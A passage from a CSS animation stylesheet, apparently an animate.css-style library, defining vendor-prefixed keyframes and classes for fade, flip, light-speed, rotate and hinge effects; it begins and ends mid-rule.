    opacity: 0;
  }

  to {
    opacity: 1;
  }
}

@keyframes fadeIn {
  from {
    opacity: 0;
  }

  to {
    opacity: 1;
  }
}

.fadeIn {
  -webkit-animation-name: fadeIn;
  animation-name: fadeIn;
}

@-webkit-keyframes fadeInDown {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0, -100%, 0);
    transform: translate3d(0, -100%, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes fadeInDown {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0, -100%, 0);
    transform: translate3d(0, -100%, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.fadeInDown {
  -webkit-animation-name: fadeInDown;
  animation-name: fadeInDown;
}

@-webkit-keyframes fadeInDownBig {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0, -2000px, 0);
    transform: translate3d(0, -2000px, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes fadeInDownBig {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0, -2000px, 0);
    transform: translate3d(0, -2000px, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.fadeInDownBig {
  -webkit-animation-name: fadeInDownBig;
  animation-name: fadeInDownBig;
}

@-webkit-keyframes fadeInLeft {
  from {
    opacity: 0;
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes fadeInLeft {
  from {
    opacity: 0;
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.fadeInLeft {
  -webkit-animation-name: fadeInLeft;
  animation-name: fadeInLeft;
}

@-webkit-keyframes fadeInLeftBig {
  from {
    opacity: 0;
    -webkit-transform: translate3d(-2000px, 0, 0);
    transform: translate3d(-2000px, 0, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes fadeInLeftBig {
  from {
    opacity: 0;
    -webkit-transform: translate3d(-2000px, 0, 0);
    transform: translate3d(-2000px, 0, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.fadeInLeftBig {
  -webkit-animation-name: fadeInLeftBig;
  animation-name: fadeInLeftBig;
}

@-webkit-keyframes fadeInRight {
  from {
    opacity: 0;
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes fadeInRight {
  from {
    opacity: 0;
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.fadeInRight {
  -webkit-animation-name: fadeInRight;
  animation-name: fadeInRight;
}

@-webkit-keyframes fadeInRightBig {
  from {
    opacity: 0;
    -webkit-transform: translate3d(2000px, 0, 0);
    transform: translate3d(2000px, 0, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes fadeInRightBig {
  from {
    opacity: 0;
    -webkit-transform: translate3d(2000px, 0, 0);
    transform: translate3d(2000px, 0, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.fadeInRightBig {
  -webkit-animation-name: fadeInRightBig;
  animation-name: fadeInRightBig;
}

@-webkit-keyframes fadeInUp {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0, 100%, 0);
    transform: translate3d(0, 100%, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes fadeInUp {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0, 100%, 0);
    transform: translate3d(0, 100%, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.fadeInUp {
  -webkit-animation-name: fadeInUp;
  animation-name: fadeInUp;
}

@-webkit-keyframes fadeInUpBig {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0, 2000px, 0);
    transform: translate3d(0, 2000px, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes fadeInUpBig {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0, 2000px, 0);
    transform: translate3d(0, 2000px, 0);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.fadeInUpBig {
  -webkit-animation-name: fadeInUpBig;
  animation-name: fadeInUpBig;
}

@-webkit-keyframes fadeOut {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
  }
}

@keyframes fadeOut {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
  }
}

.fadeOut {
  -webkit-animation-name: fadeOut;
  animation-name: fadeOut;
}

@-webkit-keyframes fadeOutDown {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, 100%, 0);
    transform: translate3d(0, 100%, 0);
  }
}

@keyframes fadeOutDown {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, 100%, 0);
    transform: translate3d(0, 100%, 0);
  }
}

.fadeOutDown {
  -webkit-animation-name: fadeOutDown;
  animation-name: fadeOutDown;
}

@-webkit-keyframes fadeOutDownBig {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, 2000px, 0);
    transform: translate3d(0, 2000px, 0);
  }
}

@keyframes fadeOutDownBig {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, 2000px, 0);
    transform: translate3d(0, 2000px, 0);
  }
}

.fadeOutDownBig {
  -webkit-animation-name: fadeOutDownBig;
  animation-name: fadeOutDownBig;
}

@-webkit-keyframes fadeOutLeft {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
  }
}

@keyframes fadeOutLeft {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
  }
}

.fadeOutLeft {
  -webkit-animation-name: fadeOutLeft;
  animation-name: fadeOutLeft;
}

@-webkit-keyframes fadeOutLeftBig {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(-2000px, 0, 0);
    transform: translate3d(-2000px, 0, 0);
  }
}

@keyframes fadeOutLeftBig {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(-2000px, 0, 0);
    transform: translate3d(-2000px, 0, 0);
  }
}

.fadeOutLeftBig {
  -webkit-animation-name: fadeOutLeftBig;
  animation-name: fadeOutLeftBig;
}

@-webkit-keyframes fadeOutRight {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
  }
}

@keyframes fadeOutRight {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
  }
}

.fadeOutRight {
  -webkit-animation-name: fadeOutRight;
  animation-name: fadeOutRight;
}

@-webkit-keyframes fadeOutRightBig {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(2000px, 0, 0);
    transform: translate3d(2000px, 0, 0);
  }
}

@keyframes fadeOutRightBig {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(2000px, 0, 0);
    transform: translate3d(2000px, 0, 0);
  }
}

.fadeOutRightBig {
  -webkit-animation-name: fadeOutRightBig;
  animation-name: fadeOutRightBig;
}

@-webkit-keyframes fadeOutUp {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, -100%, 0);
    transform: translate3d(0, -100%, 0);
  }
}

@keyframes fadeOutUp {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, -100%, 0);
    transform: translate3d(0, -100%, 0);
  }
}

.fadeOutUp {
  -webkit-animation-name: fadeOutUp;
  animation-name: fadeOutUp;
}

@-webkit-keyframes fadeOutUpBig {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, -2000px, 0);
    transform: translate3d(0, -2000px, 0);
  }
}

@keyframes fadeOutUpBig {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, -2000px, 0);
    transform: translate3d(0, -2000px, 0);
  }
}

.fadeOutUpBig {
  -webkit-animation-name: fadeOutUpBig;
  animation-name: fadeOutUpBig;
}

@-webkit-keyframes flip {
  from {
    -webkit-transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 0)
      rotate3d(0, 1, 0, -360deg);
    transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 0) rotate3d(0, 1, 0, -360deg);
    -webkit-animation-timing-function: ease-out;
    animation-timing-function: ease-out;
  }

  40% {
    -webkit-transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 150px)
      rotate3d(0, 1, 0, -190deg);
    transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 150px)
      rotate3d(0, 1, 0, -190deg);
    -webkit-animation-timing-function: ease-out;
    animation-timing-function: ease-out;
  }

  50% {
    -webkit-transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 150px)
      rotate3d(0, 1, 0, -170deg);
    transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 150px)
      rotate3d(0, 1, 0, -170deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  80% {
    -webkit-transform: perspective(400px) scale3d(0.95, 0.95, 0.95) translate3d(0, 0, 0)
      rotate3d(0, 1, 0, 0deg);
    transform: perspective(400px) scale3d(0.95, 0.95, 0.95) translate3d(0, 0, 0)
      rotate3d(0, 1, 0, 0deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  to {
    -webkit-transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 0)
      rotate3d(0, 1, 0, 0deg);
    transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 0) rotate3d(0, 1, 0, 0deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }
}

@keyframes flip {
  from {
    -webkit-transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 0)
      rotate3d(0, 1, 0, -360deg);
    transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 0) rotate3d(0, 1, 0, -360deg);
    -webkit-animation-timing-function: ease-out;
    animation-timing-function: ease-out;
  }

  40% {
    -webkit-transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 150px)
      rotate3d(0, 1, 0, -190deg);
    transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 150px)
      rotate3d(0, 1, 0, -190deg);
    -webkit-animation-timing-function: ease-out;
    animation-timing-function: ease-out;
  }

  50% {
    -webkit-transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 150px)
      rotate3d(0, 1, 0, -170deg);
    transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 150px)
      rotate3d(0, 1, 0, -170deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  80% {
    -webkit-transform: perspective(400px) scale3d(0.95, 0.95, 0.95) translate3d(0, 0, 0)
      rotate3d(0, 1, 0, 0deg);
    transform: perspective(400px) scale3d(0.95, 0.95, 0.95) translate3d(0, 0, 0)
      rotate3d(0, 1, 0, 0deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  to {
    -webkit-transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 0)
      rotate3d(0, 1, 0, 0deg);
    transform: perspective(400px) scale3d(1, 1, 1) translate3d(0, 0, 0) rotate3d(0, 1, 0, 0deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }
}

.animated.flip {
  -webkit-backface-visibility: visible;
  backface-visibility: visible;
  -webkit-animation-name: flip;
  animation-name: flip;
}

@-webkit-keyframes flipInX {
  from {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
    opacity: 0;
  }

  40% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  60% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
    transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
    opacity: 1;
  }

  80% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
    transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
  }

  to {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }
}

@keyframes flipInX {
  from {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
    opacity: 0;
  }

  40% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  60% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
    transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
    opacity: 1;
  }

  80% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
    transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
  }

  to {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }
}

.flipInX {
  -webkit-backface-visibility: visible !important;
  backface-visibility: visible !important;
  -webkit-animation-name: flipInX;
  animation-name: flipInX;
}

@-webkit-keyframes flipInY {
  from {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
    opacity: 0;
  }

  40% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  60% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
    opacity: 1;
  }

  80% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
  }

  to {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }
}

@keyframes flipInY {
  from {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
    opacity: 0;
  }

  40% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  60% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
    opacity: 1;
  }

  80% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
  }

  to {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }
}

.flipInY {
  -webkit-backface-visibility: visible !important;
  backface-visibility: visible !important;
  -webkit-animation-name: flipInY;
  animation-name: flipInY;
}

@-webkit-keyframes flipOutX {
  from {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }

  30% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    opacity: 1;
  }

  to {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    opacity: 0;
  }
}

@keyframes flipOutX {
  from {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }

  30% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    opacity: 1;
  }

  to {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    opacity: 0;
  }
}

.flipOutX {
  -webkit-animation-duration: 0.75s;
  animation-duration: 0.75s;
  -webkit-animation-name: flipOutX;
  animation-name: flipOutX;
  -webkit-backface-visibility: visible !important;
  backface-visibility: visible !important;
}

@-webkit-keyframes flipOutY {
  from {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }

  30% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -15deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -15deg);
    opacity: 1;
  }

  to {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    opacity: 0;
  }
}

@keyframes flipOutY {
  from {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }

  30% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -15deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -15deg);
    opacity: 1;
  }

  to {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    opacity: 0;
  }
}

.flipOutY {
  -webkit-animation-duration: 0.75s;
  animation-duration: 0.75s;
  -webkit-backface-visibility: visible !important;
  backface-visibility: visible !important;
  -webkit-animation-name: flipOutY;
  animation-name: flipOutY;
}

@-webkit-keyframes lightSpeedIn {
  from {
    -webkit-transform: translate3d(100%, 0, 0) skewX(-30deg);
    transform: translate3d(100%, 0, 0) skewX(-30deg);
    opacity: 0;
  }

  60% {
    -webkit-transform: skewX(20deg);
    transform: skewX(20deg);
    opacity: 1;
  }

  80% {
    -webkit-transform: skewX(-5deg);
    transform: skewX(-5deg);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes lightSpeedIn {
  from {
    -webkit-transform: translate3d(100%, 0, 0) skewX(-30deg);
    transform: translate3d(100%, 0, 0) skewX(-30deg);
    opacity: 0;
  }

  60% {
    -webkit-transform: skewX(20deg);
    transform: skewX(20deg);
    opacity: 1;
  }

  80% {
    -webkit-transform: skewX(-5deg);
    transform: skewX(-5deg);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.lightSpeedIn {
  -webkit-animation-name: lightSpeedIn;
  animation-name: lightSpeedIn;
  -webkit-animation-timing-function: ease-out;
  animation-timing-function: ease-out;
}

@-webkit-keyframes lightSpeedOut {
  from {
    opacity: 1;
  }

  to {
    -webkit-transform: translate3d(100%, 0, 0) skewX(30deg);
    transform: translate3d(100%, 0, 0) skewX(30deg);
    opacity: 0;
  }
}

@keyframes lightSpeedOut {
  from {
    opacity: 1;
  }

  to {
    -webkit-transform: translate3d(100%, 0, 0) skewX(30deg);
    transform: translate3d(100%, 0, 0) skewX(30deg);
    opacity: 0;
  }
}

.lightSpeedOut {
  -webkit-animation-name: lightSpeedOut;
  animation-name: lightSpeedOut;
  -webkit-animation-timing-function: ease-in;
  animation-timing-function: ease-in;
}

@-webkit-keyframes rotateIn {
  from {
    -webkit-transform-origin: center;
    transform-origin: center;
    -webkit-transform: rotate3d(0, 0, 1, -200deg);
    transform: rotate3d(0, 0, 1, -200deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: center;
    transform-origin: center;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

@keyframes rotateIn {
  from {
    -webkit-transform-origin: center;
    transform-origin: center;
    -webkit-transform: rotate3d(0, 0, 1, -200deg);
    transform: rotate3d(0, 0, 1, -200deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: center;
    transform-origin: center;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

.rotateIn {
  -webkit-animation-name: rotateIn;
  animation-name: rotateIn;
}

@-webkit-keyframes rotateInDownLeft {
  from {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: rotate3d(0, 0, 1, -45deg);
    transform: rotate3d(0, 0, 1, -45deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

@keyframes rotateInDownLeft {
  from {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: rotate3d(0, 0, 1, -45deg);
    transform: rotate3d(0, 0, 1, -45deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

.rotateInDownLeft {
  -webkit-animation-name: rotateInDownLeft;
  animation-name: rotateInDownLeft;
}

@-webkit-keyframes rotateInDownRight {
  from {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: rotate3d(0, 0, 1, 45deg);
    transform: rotate3d(0, 0, 1, 45deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

@keyframes rotateInDownRight {
  from {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: rotate3d(0, 0, 1, 45deg);
    transform: rotate3d(0, 0, 1, 45deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

.rotateInDownRight {
  -webkit-animation-name: rotateInDownRight;
  animation-name: rotateInDownRight;
}

@-webkit-keyframes rotateInUpLeft {
  from {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: rotate3d(0, 0, 1, 45deg);
    transform: rotate3d(0, 0, 1, 45deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

@keyframes rotateInUpLeft {
  from {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: rotate3d(0, 0, 1, 45deg);
    transform: rotate3d(0, 0, 1, 45deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

.rotateInUpLeft {
  -webkit-animation-name: rotateInUpLeft;
  animation-name: rotateInUpLeft;
}

@-webkit-keyframes rotateInUpRight {
  from {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: rotate3d(0, 0, 1, -90deg);
    transform: rotate3d(0, 0, 1, -90deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

@keyframes rotateInUpRight {
  from {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: rotate3d(0, 0, 1, -90deg);
    transform: rotate3d(0, 0, 1, -90deg);
    opacity: 0;
  }

  to {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    opacity: 1;
  }
}

.rotateInUpRight {
  -webkit-animation-name: rotateInUpRight;
  animation-name: rotateInUpRight;
}

@-webkit-keyframes rotateOut {
  from {
    -webkit-transform-origin: center;
    transform-origin: center;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: center;
    transform-origin: center;
    -webkit-transform: rotate3d(0, 0, 1, 200deg);
    transform: rotate3d(0, 0, 1, 200deg);
    opacity: 0;
  }
}

@keyframes rotateOut {
  from {
    -webkit-transform-origin: center;
    transform-origin: center;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: center;
    transform-origin: center;
    -webkit-transform: rotate3d(0, 0, 1, 200deg);
    transform: rotate3d(0, 0, 1, 200deg);
    opacity: 0;
  }
}

.rotateOut {
  -webkit-animation-name: rotateOut;
  animation-name: rotateOut;
}

@-webkit-keyframes rotateOutDownLeft {
  from {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: rotate3d(0, 0, 1, 45deg);
    transform: rotate3d(0, 0, 1, 45deg);
    opacity: 0;
  }
}

@keyframes rotateOutDownLeft {
  from {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: rotate3d(0, 0, 1, 45deg);
    transform: rotate3d(0, 0, 1, 45deg);
    opacity: 0;
  }
}

.rotateOutDownLeft {
  -webkit-animation-name: rotateOutDownLeft;
  animation-name: rotateOutDownLeft;
}

@-webkit-keyframes rotateOutDownRight {
  from {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: rotate3d(0, 0, 1, -45deg);
    transform: rotate3d(0, 0, 1, -45deg);
    opacity: 0;
  }
}

@keyframes rotateOutDownRight {
  from {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: rotate3d(0, 0, 1, -45deg);
    transform: rotate3d(0, 0, 1, -45deg);
    opacity: 0;
  }
}

.rotateOutDownRight {
  -webkit-animation-name: rotateOutDownRight;
  animation-name: rotateOutDownRight;
}

@-webkit-keyframes rotateOutUpLeft {
  from {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: rotate3d(0, 0, 1, -45deg);
    transform: rotate3d(0, 0, 1, -45deg);
    opacity: 0;
  }
}

@keyframes rotateOutUpLeft {
  from {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: left bottom;
    transform-origin: left bottom;
    -webkit-transform: rotate3d(0, 0, 1, -45deg);
    transform: rotate3d(0, 0, 1, -45deg);
    opacity: 0;
  }
}

.rotateOutUpLeft {
  -webkit-animation-name: rotateOutUpLeft;
  animation-name: rotateOutUpLeft;
}

@-webkit-keyframes rotateOutUpRight {
  from {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: rotate3d(0, 0, 1, 90deg);
    transform: rotate3d(0, 0, 1, 90deg);
    opacity: 0;
  }
}

@keyframes rotateOutUpRight {
  from {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    opacity: 1;
  }

  to {
    -webkit-transform-origin: right bottom;
    transform-origin: right bottom;
    -webkit-transform: rotate3d(0, 0, 1, 90deg);
    transform: rotate3d(0, 0, 1, 90deg);
    opacity: 0;
  }
}

.rotateOutUpRight {
  -webkit-animation-name: rotateOutUpRight;
  animation-name: rotateOutUpRight;
}

@-webkit-keyframes hinge {
  0% {
    -webkit-transform-origin: top left;
    transform-origin: top left;
    -webkit-animation-timing-function: ease-in-out;
    animation-timing-function: ease-in-out;
  }

  20%,
  60% {
    -webkit-transform: rotate3d(0, 0, 1, 80deg);
    transform: rotate3d(0, 0, 1, 80deg);
    -webkit-transform-origin: top left;
    transform-origin: top left;
    -webkit-animation-timing-function: ease-in-out;
    animation-timing-function: ease-in-out;
  }

  40%,
  80% {
    -webkit-transform: rotate3d(0, 0, 1, 60deg);
    transform: rotate3d(0, 0, 1, 60deg);
    -webkit-transform-origin: top left;
    transform-origin: top left;
    -webkit-animation-timing-function: ease-in-out;
    animation-timing-function: ease-in-out;
    opacity: 1;
  }

  to {
    -webkit-transform: translate3d(0, 700px, 0);
    transform: translate3d(0, 700px, 0);
    opacity: 0;
